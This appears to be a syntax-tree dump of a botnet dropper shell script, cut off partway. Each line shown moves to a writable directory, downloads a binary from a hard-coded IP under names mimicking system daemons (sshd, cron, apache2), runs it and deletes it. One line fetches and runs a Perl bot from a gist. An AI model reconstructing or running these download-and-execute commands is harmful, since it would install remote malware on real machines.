ListNode(lineno=2, pos=(12, 132), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 96), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 96), word='http://169.57.17.91/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(96, 97)),
  CommandNode(lineno=2, pos=(98, 111), parts=[
    WordNode(lineno=2, pos=(98, 103), word='chmod'),
    WordNode(lineno=2, pos=(104, 106), word='+x'),
    WordNode(lineno=2, pos=(107, 111), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(111, 112)),
  CommandNode(lineno=2, pos=(113, 119), parts=[
    WordNode(lineno=2, pos=(113, 119), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(119, 120)),
  CommandNode(lineno=2, pos=(121, 132), parts=[
    WordNode(lineno=2, pos=(121, 123), word='rm'),
    WordNode(lineno=2, pos=(124, 127), word='-rf'),
    WordNode(lineno=2, pos=(128, 132), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(133, 253), parts=[
  CommandNode(lineno=3, pos=(133, 140), parts=[
    WordNode(lineno=3, pos=(133, 135), word='cd'),
    WordNode(lineno=3, pos=(136, 140), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(141, 143)),
  CommandNode(lineno=3, pos=(144, 155), parts=[
    WordNode(lineno=3, pos=(144, 146), word='cd'),
    WordNode(lineno=3, pos=(147, 155), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(156, 158)),
  CommandNode(lineno=3, pos=(159, 166), parts=[
    WordNode(lineno=3, pos=(159, 161), word='cd'),
    WordNode(lineno=3, pos=(162, 166), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(167, 169)),
  CommandNode(lineno=3, pos=(170, 178), parts=[
    WordNode(lineno=3, pos=(170, 172), word='cd'),
    WordNode(lineno=3, pos=(173, 178), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(179, 181)),
  CommandNode(lineno=3, pos=(182, 186), parts=[
    WordNode(lineno=3, pos=(182, 184), word='cd'),
    WordNode(lineno=3, pos=(185, 186), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(186, 187)),
  CommandNode(lineno=3, pos=(188, 217), parts=[
    WordNode(lineno=3, pos=(188, 192), word='wget'),
    WordNode(lineno=3, pos=(193, 217), word='http://169.57.17.91/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(217, 218)),
  CommandNode(lineno=3, pos=(219, 232), parts=[
    WordNode(lineno=3, pos=(219, 224), word='chmod'),
    WordNode(lineno=3, pos=(225, 227), word='+x'),
    WordNode(lineno=3, pos=(228, 232), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(232, 233)),
  CommandNode(lineno=3, pos=(234, 240), parts=[
    WordNode(lineno=3, pos=(234, 240), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(240, 241)),
  CommandNode(lineno=3, pos=(242, 253), parts=[
    WordNode(lineno=3, pos=(242, 244), word='rm'),
    WordNode(lineno=3, pos=(245, 248), word='-rf'),
    WordNode(lineno=3, pos=(249, 253), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(254, 386), parts=[
  CommandNode(lineno=4, pos=(254, 261), parts=[
    WordNode(lineno=4, pos=(254, 256), word='cd'),
    WordNode(lineno=4, pos=(257, 261), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(262, 264)),
  CommandNode(lineno=4, pos=(265, 276), parts=[
    WordNode(lineno=4, pos=(265, 267), word='cd'),
    WordNode(lineno=4, pos=(268, 276), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(277, 279)),
  CommandNode(lineno=4, pos=(280, 287), parts=[
    WordNode(lineno=4, pos=(280, 282), word='cd'),
    WordNode(lineno=4, pos=(283, 287), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(288, 290)),
  CommandNode(lineno=4, pos=(291, 299), parts=[
    WordNode(lineno=4, pos=(291, 293), word='cd'),
    WordNode(lineno=4, pos=(294, 299), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(300, 302)),
  CommandNode(lineno=4, pos=(303, 307), parts=[
    WordNode(lineno=4, pos=(303, 305), word='cd'),
    WordNode(lineno=4, pos=(306, 307), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(307, 308)),
  CommandNode(lineno=4, pos=(309, 341), parts=[
    WordNode(lineno=4, pos=(309, 313), word='wget'),
    WordNode(lineno=4, pos=(314, 341), word='http://169.57.17.91/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(341, 342)),
  CommandNode(lineno=4, pos=(343, 359), parts=[
    WordNode(lineno=4, pos=(343, 348), word='chmod'),
    WordNode(lineno=4, pos=(349, 351), word='+x'),
    WordNode(lineno=4, pos=(352, 359), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(359, 360)),
  CommandNode(lineno=4, pos=(361, 370), parts=[
    WordNode(lineno=4, pos=(361, 370), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(370, 371)),
  CommandNode(lineno=4, pos=(372, 386), parts=[
    WordNode(lineno=4, pos=(372, 374), word='rm'),
    WordNode(lineno=4, pos=(375, 378), word='-rf'),
    WordNode(lineno=4, pos=(379, 386), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(387, 618), parts=[
  CommandNode(lineno=5, pos=(387, 394), parts=[
    WordNode(lineno=5, pos=(387, 389), word='cd'),
    WordNode(lineno=5, pos=(390, 394), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(395, 397)),
  CommandNode(lineno=5, pos=(398, 409), parts=[
    WordNode(lineno=5, pos=(398, 400), word='cd'),
    WordNode(lineno=5, pos=(401, 409), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(410, 412)),
  CommandNode(lineno=5, pos=(413, 420), parts=[
    WordNode(lineno=5, pos=(413, 415), word='cd'),
    WordNode(lineno=5, pos=(416, 420), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(421, 423)),
  CommandNode(lineno=5, pos=(424, 432), parts=[
    WordNode(lineno=5, pos=(424, 426), word='cd'),
    WordNode(lineno=5, pos=(427, 432), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(433, 435)),
  CommandNode(lineno=5, pos=(436, 440), parts=[
    WordNode(lineno=5, pos=(436, 438), word='cd'),
    WordNode(lineno=5, pos=(439, 440), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(440, 441)),
  CommandNode(lineno=5, pos=(442, 573), parts=[
    WordNode(lineno=5, pos=(442, 446), word='wget'),
    WordNode(lineno=5, pos=(447, 573), word='https://gist.githubusercontent.com/PajeBR/3a210b3840858c0e93e29a82bc8780fc/raw/f9cf87893d3e265b41bf1a76f7b06a0e165dd76e/bot.pl'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(573, 574)),
  CommandNode(lineno=5, pos=(575, 590), parts=[
    WordNode(lineno=5, pos=(575, 580), word='chmod'),
    WordNode(lineno=5, pos=(581, 583), word='+x'),
    WordNode(lineno=5, pos=(584, 590), word='bot.pl'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(590, 591)),
  CommandNode(lineno=5, pos=(592, 603), parts=[
    WordNode(lineno=5, pos=(592, 596), word='perl'),
    WordNode(lineno=5, pos=(597, 603), word='bot.pl'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(603, 604)),
  CommandNode(lineno=5, pos=(605, 618), parts=[
    WordNode(lineno=5, pos=(605, 607), word='rm'),
    WordNode(lineno=5, pos=(608, 611), word='-rf'),
    WordNode(lineno=5, pos=(612, 618), word='bot.pl'),
  ]),
])
ListNode(lineno=6, pos=(619, 739), parts=[
  CommandNode(lineno=6, pos=(619, 626), parts=[
    WordNode(lineno=6, pos=(619, 621), word='cd'),
    WordNode(lineno=6, pos=(622, 626), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(627, 629)),
  CommandNode(lineno=6, pos=(630, 641), parts=[
    WordNode(lineno=6, pos=(630, 632), word='cd'),
    WordNode(lineno=6, pos=(633, 641), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(642, 644)),
  CommandNode(lineno=6, pos=(645, 652), parts=[
    WordNode(lineno=6, pos=(645, 647), word='cd'),
    WordNode(lineno=6, pos=(648, 652), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(653, 655)),
  CommandNode(lineno=6, pos=(656, 664), parts=[
    WordNode(lineno=6, pos=(656, 658), word='cd'),
    WordNode(lineno=6, pos=(659, 664), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(665, 667)),
  CommandNode(lineno=6, pos=(668, 672), parts=[
    WordNode(lineno=6, pos=(668, 670), word='cd'),
    WordNode(lineno=6, pos=(671, 672), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(672, 673)),
  CommandNode(lineno=6, pos=(674, 703), parts=[
    WordNode(lineno=6, pos=(674, 678), word='wget'),
    WordNode(lineno=6, pos=(679, 703), word='http://169.57.17.91/bash'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(703, 704)),
  CommandNode(lineno=6, pos=(705, 718), parts=[
    WordNode(lineno=6, pos=(705, 710), word='chmod'),
    WordNode(lineno=6, pos=(711, 713), word='+x'),
    WordNode(lineno=6, pos=(714, 718), word='bash'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(718, 719)),
  CommandNode(lineno=6, pos=(720, 726), parts=[
    WordNode(lineno=6, pos=(720, 726), word='./bash'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(726, 727)),
  CommandNode(lineno=6, pos=(728, 739), parts=[
    WordNode(lineno=6, pos=(728, 730), word='rm'),
    WordNode(lineno=6, pos=(731, 734), word='-rf'),
    WordNode(lineno=6, pos=(735, 739), word='bash'),
  ]),
])
ListNode(lineno=7, pos=(740, 860), parts=[
  CommandNode(lineno=7, pos=(740, 747), parts=[
    WordNode(lineno=7, pos=(740, 742), word='cd'),
    WordNode(lineno=7, pos=(743, 747), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(748, 750)),
  CommandNode(lineno=7, pos=(751, 762), parts=[
    WordNode(lineno=7, pos=(751, 753), word='cd'),
    WordNode(lineno=7, pos=(754, 762), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(763, 765)),
  CommandNode(lineno=7, pos=(766, 773), parts=[
    WordNode(lineno=7, pos=(766, 768), word='cd'),
    WordNode(lineno=7, pos=(769, 773), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(774, 776)),
  CommandNode(lineno=7, pos=(777, 785), parts=[
    WordNode(lineno=7, pos=(777, 779), word='cd'),
    WordNode(lineno=7, pos=(780, 785), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(786, 788)),
  CommandNode(lineno=7, pos=(789, 793), parts=[
    WordNode(lineno=7, pos=(789, 791), word='cd'),
    WordNode(lineno=7, pos=(792, 793), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(793, 794)),
  CommandNode(lineno=7, pos=(795, 824), parts=[
    WordNode(lineno=7, pos=(795, 799), word='wget'),
    WordNode(lineno=7, pos=(800, 824), word='http://169.57.17.91/tftp'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(824, 825)),
  CommandNode(lineno=7, pos=(826, 839), parts=[
    WordNode(lineno=7, pos=(826, 831), word='chmod'),
    WordNode(lineno=7, pos=(832, 834), word='+x'),
    WordNode(lineno=7, pos=(835, 839), word='tftp'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(839, 840)),
  CommandNode(lineno=7, pos=(841, 847), parts=[
    WordNode(lineno=7, pos=(841, 847), word='./tftp'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(847, 848)),
  CommandNode(lineno=7, pos=(849, 860), parts=[
    WordNode(lineno=7, pos=(849, 851), word='rm'),
    WordNode(lineno=7, pos=(852, 855), word='-rf'),
    WordNode(lineno=7, pos=(856, 860), word='tftp'),
  ]),
])
ListNode(lineno=8, pos=(861, 981), parts=[
  CommandNode(lineno=8, pos=(861, 868), parts=[
    WordNode(lineno=8, pos=(861, 863), word='cd'),
    WordNode(lineno=8, pos=(864, 868), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(869, 871)),
  CommandNode(lineno=8, pos=(872, 883), parts=[
    WordNode(lineno=8, pos=(872, 874), word='cd'),
    WordNode(lineno=8, pos=(875, 883), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(884, 886)),
  CommandNode(lineno=8, pos=(887, 894), parts=[
    WordNode(lineno=8, pos=(887, 889), word='cd'),
    WordNode(lineno=8, pos=(890, 894), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(895, 897)),
  CommandNode(lineno=8, pos=(898, 906), parts=[
    WordNode(lineno=8, pos=(898, 900), word='cd'),
    WordNode(lineno=8, pos=(901, 906), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(907, 909)),
  CommandNode(lineno=8, pos=(910, 914), parts=[
    WordNode(lineno=8, pos=(910, 912), word='cd'),
    WordNode(lineno=8, pos=(913, 914), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(914, 915)),
  CommandNode(lineno=8, pos=(916, 945), parts=[
    WordNode(lineno=8, pos=(916, 920), word='wget'),
    WordNode(lineno=8, pos=(921, 945), word='http://169.57.17.91/wget'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(945, 946)),
  CommandNode(lineno=8, pos=(947, 960), parts=[
    WordNode(lineno=8, pos=(947, 952), word='chmod'),
    WordNode(lineno=8, pos=(953, 955), word='+x'),
    WordNode(lineno=8, pos=(956, 960), word='wget'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(960, 961)),
  CommandNode(lineno=8, pos=(962, 968), parts=[
    WordNode(lineno=8, pos=(962, 968), word='./wget'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(968, 969)),
  CommandNode(lineno=8, pos=(970, 981), parts=[
    WordNode(lineno=8, pos=(970, 972), word='rm'),
    WordNode(lineno=8, pos=(973, 976), word='-rf'),
    WordNode(lineno=8, pos=(977, 981), word='wget'),
  ]),
])
ListNode(lineno=9, pos=(982, 1102), parts=[
  CommandNode(lineno=9, pos=(982, 989), parts=[
    WordNode(lineno=9, pos=(982, 984), word='cd'),
    WordNode(lineno=9, pos=(985, 989), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(990, 992)),
  CommandNode(lineno=9, pos=(993, 1004), parts=[
    WordNode(lineno=9, pos=(993, 995), word='cd'),
    WordNode(lineno=9, pos=(996, 1004), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1005, 1007)),
  CommandNode(lineno=9, pos=(1008, 1015), parts=[
    WordNode(lineno=9, pos=(1008, 1010), word='cd'),
    WordNode(lineno=9, pos=(1011, 1015), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1016, 1018)),
  CommandNode(lineno=9, pos=(1019, 1027), parts=[
    WordNode(lineno=9, pos=(1019, 1021), word='cd'),
    WordNode(lineno=9, pos=(1022, 1027), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1028, 1030)),
  CommandNode(lineno=9, pos=(1031, 1035), parts=[
    WordNode(lineno=9, pos=(1031, 1033), word='cd'),
    WordNode(lineno=9, pos=(1034, 1035), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1035, 1036)),
  CommandNode(lineno=9, pos=(1037, 1066), parts=[
    WordNode(lineno=9, pos=(1037, 1041), word='wget'),
    WordNode(lineno=9, pos=(1042, 1066), word='http://169.57.17.91/cron'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1066, 1067)),
  CommandNode(lineno=9, pos=(1068, 1081), parts=[
    WordNode(lineno=9, pos=(1068, 1073), word='chmod'),
    WordNode(lineno=9, pos=(1074, 1076), word='+x'),
    WordNode(lineno=9, pos=(1077, 1081), word='cron'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1081, 1082)),
  CommandNode(lineno=9, pos=(1083, 1089), parts=[
    WordNode(lineno=9, pos=(1083, 1089), word='./cron'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1089, 1090)),
  CommandNode(lineno=9, pos=(1091, 1102), parts=[
    WordNode(lineno=9, pos=(1091, 1093), word='rm'),
    WordNode(lineno=9, pos=(1094, 1097), word='-rf'),
    WordNode(lineno=9, pos=(1098, 1102), word='cron'),
  ]),
])
ListNode(lineno=10, pos=(1103, 1219), parts=[
  CommandNode(lineno=10, pos=(1103, 1110), parts=[
    WordNode(lineno=10, pos=(1103, 1105), word='cd'),
    WordNode(lineno=10, pos=(1106, 1110), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1111, 1113)),
  CommandNode(lineno=10, pos=(1114, 1125), parts=[
    WordNode(lineno=10, pos=(1114, 1116), word='cd'),
    WordNode(lineno=10, pos=(1117, 1125), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1126, 1128)),
  CommandNode(lineno=10, pos=(1129, 1136), parts=[
    WordNode(lineno=10, pos=(1129, 1131), word='cd'),
    WordNode(lineno=10, pos=(1132, 1136), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1137, 1139)),
  CommandNode(lineno=10, pos=(1140, 1148), parts=[
    WordNode(lineno=10, pos=(1140, 1142), word='cd'),
    WordNode(lineno=10, pos=(1143, 1148), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1149, 1151)),
  CommandNode(lineno=10, pos=(1152, 1156), parts=[
    WordNode(lineno=10, pos=(1152, 1154), word='cd'),
    WordNode(lineno=10, pos=(1155, 1156), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1156, 1157)),
  CommandNode(lineno=10, pos=(1158, 1186), parts=[
    WordNode(lineno=10, pos=(1158, 1162), word='wget'),
    WordNode(lineno=10, pos=(1163, 1186), word='http://169.57.17.91/ftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1186, 1187)),
  CommandNode(lineno=10, pos=(1188, 1200), parts=[
    WordNode(lineno=10, pos=(1188, 1193), word='chmod'),
    WordNode(lineno=10, pos=(1194, 1196), word='+x'),
    WordNode(lineno=10, pos=(1197, 1200), word='ftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1200, 1201)),
  CommandNode(lineno=10, pos=(1202, 1207), parts=[
    WordNode(lineno=10, pos=(1202, 1207), word='./ftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1207, 1208)),
  CommandNode(lineno=10, pos=(1209, 1219), parts=[
    WordNode(lineno=10, pos=(1209, 1211), word='rm'),
    WordNode(lineno=10, pos=(1212, 1215), word='-rf'),
    WordNode(lineno=10, pos=(1216, 1219), word='ftp'),
  ]),
])
ListNode(lineno=11, pos=(1220, 1340), parts=[
  CommandNode(lineno=11, pos=(1220, 1227), parts=[
    WordNode(lineno=11, pos=(1220, 1222), word='cd'),
    WordNode(lineno=11, pos=(1223, 1227), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1228, 1230)),
  CommandNode(lineno=11, pos=(1231, 1242), parts=[
    WordNode(lineno=11, pos=(1231, 1233), word='cd'),
    WordNode(lineno=11, pos=(1234, 1242), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1243, 1245)),
  CommandNode(lineno=11, pos=(1246, 1253), parts=[
    WordNode(lineno=11, pos=(1246, 1248), word='cd'),
    WordNode(lineno=11, pos=(1249, 1253), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1254, 1256)),
  CommandNode(lineno=11, pos=(1257, 1265), parts=[
    WordNode(lineno=11, pos=(1257, 1259), word='cd'),
    WordNode(lineno=11, pos=(1260, 1265), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1266, 1268)),
  CommandNode(lineno=11, pos=(1269, 1273), parts=[
    WordNode(lineno=11, pos=(1269, 1271), word='cd'),
    WordNode(lineno=11, pos=(1272, 1273), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1273, 1274)),
  CommandNode(lineno=11, pos=(1275, 1304), parts=[
    WordNode(lineno=11, pos=(1275, 1279), word='wget'),
    WordNode(lineno=11, pos=(1280, 1304), word='http://169.57.17.91/pftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1304, 1305)),
  CommandNode(lineno=11, pos=(1306, 1319), parts=[
    WordNode(lineno=11, pos=(1306, 1311), word='chmod'),
    WordNode(lineno=11, pos=(1312, 1314), word='+x'),
    WordNode(lineno=11, pos=(1315, 1319), word='pftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1319, 1320)),
  CommandNode(lineno=11, pos=(1321, 1327), parts=[
    WordNode(lineno=11, pos=(1321, 1327), word='./pftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1327, 1328)),
  CommandNode(lineno=11, pos=(1329, 1340), parts=[
    WordNode(lineno=11, pos=(1329, 1331), word='rm'),
    WordNode(lineno=11, pos=(1332, 1335), word='-rf'),
    WordNode(lineno=11, pos=(1336, 1340), word='pftp'),
  ]),
])
ListNode(lineno=12, pos=(1341, 1453), parts=[
  CommandNode(lineno=12, pos=(1341, 1348), parts=[
    WordNode(lineno=12, pos=(1341, 1343), word='cd'),
    WordNode(lineno=12, pos=(1344, 1348), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1349, 1351)),
  CommandNode(lineno=12, pos=(1352, 1363), parts=[
    WordNode(lineno=12, pos=(1352, 1354), word='cd'),
    WordNode(lineno=12, pos=(1355, 1363), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1364, 1366)),
  CommandNode(lineno=12, pos=(1367, 1374), parts=[
    WordNode(lineno=12, pos=(1367, 1369), word='cd'),
    WordNode(lineno=12, pos=(1370, 1374), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1375, 1377)),
  CommandNode(lineno=12, pos=(1378, 1386), parts=[
    WordNode(lineno=12, pos=(1378, 1380), word='cd'),
    WordNode(lineno=12, pos=(1381, 1386), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1387, 1389)),
  CommandNode(lineno=12, pos=(1390, 1394), parts=[
    WordNode(lineno=12, pos=(1390, 1392), word='cd'),
    WordNode(lineno=12, pos=(1393, 1394), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1394, 1395)),
  CommandNode(lineno=12, pos=(1396, 1423), parts=[
    WordNode(lineno=12, pos=(1396, 1400), word='wget'),
    WordNode(lineno=12, pos=(1401, 1423), word='http://169.57.17.91/sh'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1423, 1424)),
  CommandNode(lineno=12, pos=(1425, 1436), parts=[
    WordNode(lineno=12, pos=(1425, 1430), word='chmod'),
    WordNode(lineno=12, pos=(1431, 1433), word='+x'),
    WordNode(lineno=12, pos=(1434, 1436), word='sh'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1436, 1437)),
  CommandNode(lineno=12, pos=(1438, 1442), parts=[
    WordNode(lineno=12, pos=(1438, 1442), word='./sh'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1442, 1443)),
  CommandNode(lineno=12, pos=(1444, 1453), parts=[
    WordNode(lineno=12, pos=(1444, 1446), word='rm'),
    WordNode(lineno=12, pos=(1447, 1450), word='-rf'),
    WordNode(lineno=12, pos=(1451, 1453), word='sh'),
  ]),
])
ListNode(lineno=13, pos=(1454, 1570), parts=[
  CommandNode(lineno=13, pos=(1454, 1461), parts=[
    WordNode(lineno=13, pos=(1454, 1456), word='cd'),
    WordNode(lineno=13, pos=(1457, 1461), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1462, 1464)),
  CommandNode(lineno=13, pos=(1465, 1476), parts=[
    WordNode(lineno=13, pos=(1465, 1467), word='cd'),
    WordNode(lineno=13, pos=(1468, 1476), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1477, 1479)),
  CommandNode(lineno=13, pos=(1480, 1487), parts=[
    WordNode(lineno=13, pos=(1480, 1482), word='cd'),
    WordNode(lineno=13, pos=(1483, 1487), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1488, 1490)),
  CommandNode(lineno=13, pos=(1491, 1499), parts=[
    WordNode(lineno=13, pos=(1491, 1493), word='cd'),
    WordNode(lineno=13, pos=(1494, 1499), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1500, 1502)),
  CommandNode(lineno=13, pos=(1503, 1507), parts=[
    WordNode(lineno=13, pos=(1503, 1505), word='cd'),
    WordNode(lineno=13, pos=(1506, 1507), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1507, 1508)),
  CommandNode(lineno=13, pos=(1509, 1537), parts=[
    WordNode(lineno=13, pos=(1509, 1513), word='wget'),
    WordNode(lineno=13, pos=(1514, 1537), word='http://169.57.17.91/ '),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1537, 1538)),
  CommandNode(lineno=13, pos=(1539, 1551), parts=[
    WordNode(lineno=13, pos=(1539, 1544), word='chmod'),
    WordNode(lineno=13, pos=(1545, 1547), word='+x'),
    WordNode(lineno=13, pos=(1548, 1551), word=' '),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1551, 1552)),
  CommandNode(lineno=13, pos=(1553, 1558), parts=[
    WordNode(lineno=13, pos=(1553, 1558), word='./ '),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1558, 1559)),
  CommandNode(lineno=13, pos=(1560, 1570), parts=[
    WordNode(lineno=13, pos=(1560, 1562), word='rm'),
    WordNode(lineno=13, pos=(1563, 1566), word='-rf'),
    WordNode(lineno=13, pos=(1567, 1570), word=' '),
  ]),
])
ListNode(lineno=14, pos=(1571, 1703), parts=[
  CommandNode(lineno=14, pos=(1571, 1578), parts=[
    WordNode(lineno=14, pos=(1571, 1573), word='cd'),
    WordNode(lineno=14, pos=(1574, 1578), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1579, 1581)),
  CommandNode(lineno=14, pos=(1582, 1593), parts=[
    WordNode(lineno=14, pos=(1582, 1584), word='cd'),
    WordNode(lineno=14, pos=(1585, 1593), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1594, 1596)),
  CommandNode(lineno=14, pos=(1597, 1604), parts=[
    WordNode(lineno=14, pos=(1597, 1599), word='cd'),
    WordNode(lineno=14, pos=(1600, 1604), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1605, 1607)),
  CommandNode(lineno=14, pos=(1608, 1616), parts=[
    WordNode(lineno=14, pos=(1608, 1610), word='cd'),
    WordNode(lineno=14, pos=(1611, 1616), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1617, 1619)),
  CommandNode(lineno=14, pos=(1620, 1624), parts=[
    WordNode(lineno=14, pos=(1620, 1622), word='cd'),
    WordNode(lineno=14, pos=(1623, 1624), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1624, 1625)),
  CommandNode(lineno=14, pos=(1626, 1658), parts=[
    WordNode(lineno=14, pos=(1626, 1630), word='wget'),
    WordNode(lineno=14, pos=(1631, 1658), word='http://169.57.17.91/apache2'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1658, 1659)),
  CommandNode(lineno=14, pos=(1660, 1676), parts=[
    WordNode(lineno=14, pos=(1660, 1665), word='chmod'),
    WordNode(lineno=14, pos=(1666, 1668), word='+x'),
    WordNode(lineno=14, pos=(1669, 1676), word='apache2'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1676, 1677)),
  CommandNode(lineno=14, pos=(1678, 1687), parts=[
    WordNode(lineno=14, pos=(1678, 1687), word='./apache2'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1687, 1688)),
  CommandNode(lineno=14, pos=(1689, 1703), parts=[
    WordNode(lineno=14, pos=(1689, 1691), word='rm'),
    WordNode(lineno=14, pos=(1692, 1695), word='-rf'),
    WordNode(lineno=14, pos=(1696, 1703), word='apache2'),
  ]),
])
ListNode(lineno=15, pos=(1704, 1836), parts=[
  CommandNode(lineno=15, pos=(1704, 1711), parts=[
    WordNode(lineno=15, pos=(1704, 1706), word='cd'),
    WordNode(lineno=15, pos=(1707, 1711), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1712, 1714)),
